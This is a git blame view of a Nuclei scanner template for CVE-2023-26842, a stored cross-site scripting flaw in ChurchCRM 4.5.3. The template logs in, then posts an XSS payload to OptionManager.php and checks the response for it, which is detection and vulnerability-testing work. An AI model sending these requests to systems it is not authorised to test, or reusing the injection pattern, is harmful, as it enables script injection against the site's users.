daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-26842.yaml

64 lines
2.4 KiB
YAML
Raw Normal View History

Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
id: CVE-2023-26842
info:
lint fix
2023-06-26 05:37:41 +00:00
name: ChurchCRM 4.5.3 - Cross-Site Scripting
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
author: Harsh
severity: medium
description: |
A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26842
- https://nvd.nist.gov/vuln/detail/CVE-2023-26842
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
- https://github.com/10splayaSec/CVE-Disclosures
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-26842
cwe-id: CWE-79
product/queries updated
2024-05-31 19:23:20 +00:00
epss-score: 0.00169
epss-percentile: 0.53813
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
metadata:
verified: true
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
max-request: 2
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: churchcrm
product: churchcrm
auto tagging via templateman
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated
updated path,info
2023-06-26 05:32:18 +00:00
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
http:
- raw:
- |
updated path,info
2023-06-26 05:32:18 +00:00
POST /session/begin HTTP/1.1
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
updated path,info
2023-06-26 05:32:18 +00:00
POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=" onfocus=alert(document.domain) autofocus="&AddField=Add+New+Person+Classification
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
updated path,info
2023-06-26 05:32:18 +00:00
- 'contains(content_type_2, "text/html")'
Create CVE-2023-26842.yaml
2023-06-24 20:02:26 +00:00
- 'contains(body_2, "onfocus=alert(document.domain) autofocus=")'
- 'contains(body_2, "ChurchCRM")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot:
2024-06-01 06:53:00 +00:00
# digest: 4a0a0047304502204811c3399bdef9b6e0dd13a822ade7c6c9a78fa31bcbd88b7789937bc24c68150221008a9fefa1ec16084c87e7350bafea77fc13dc3b235e9ab50c4cc1728b4da014e8:922c64590222798bb761d5b6d8e72950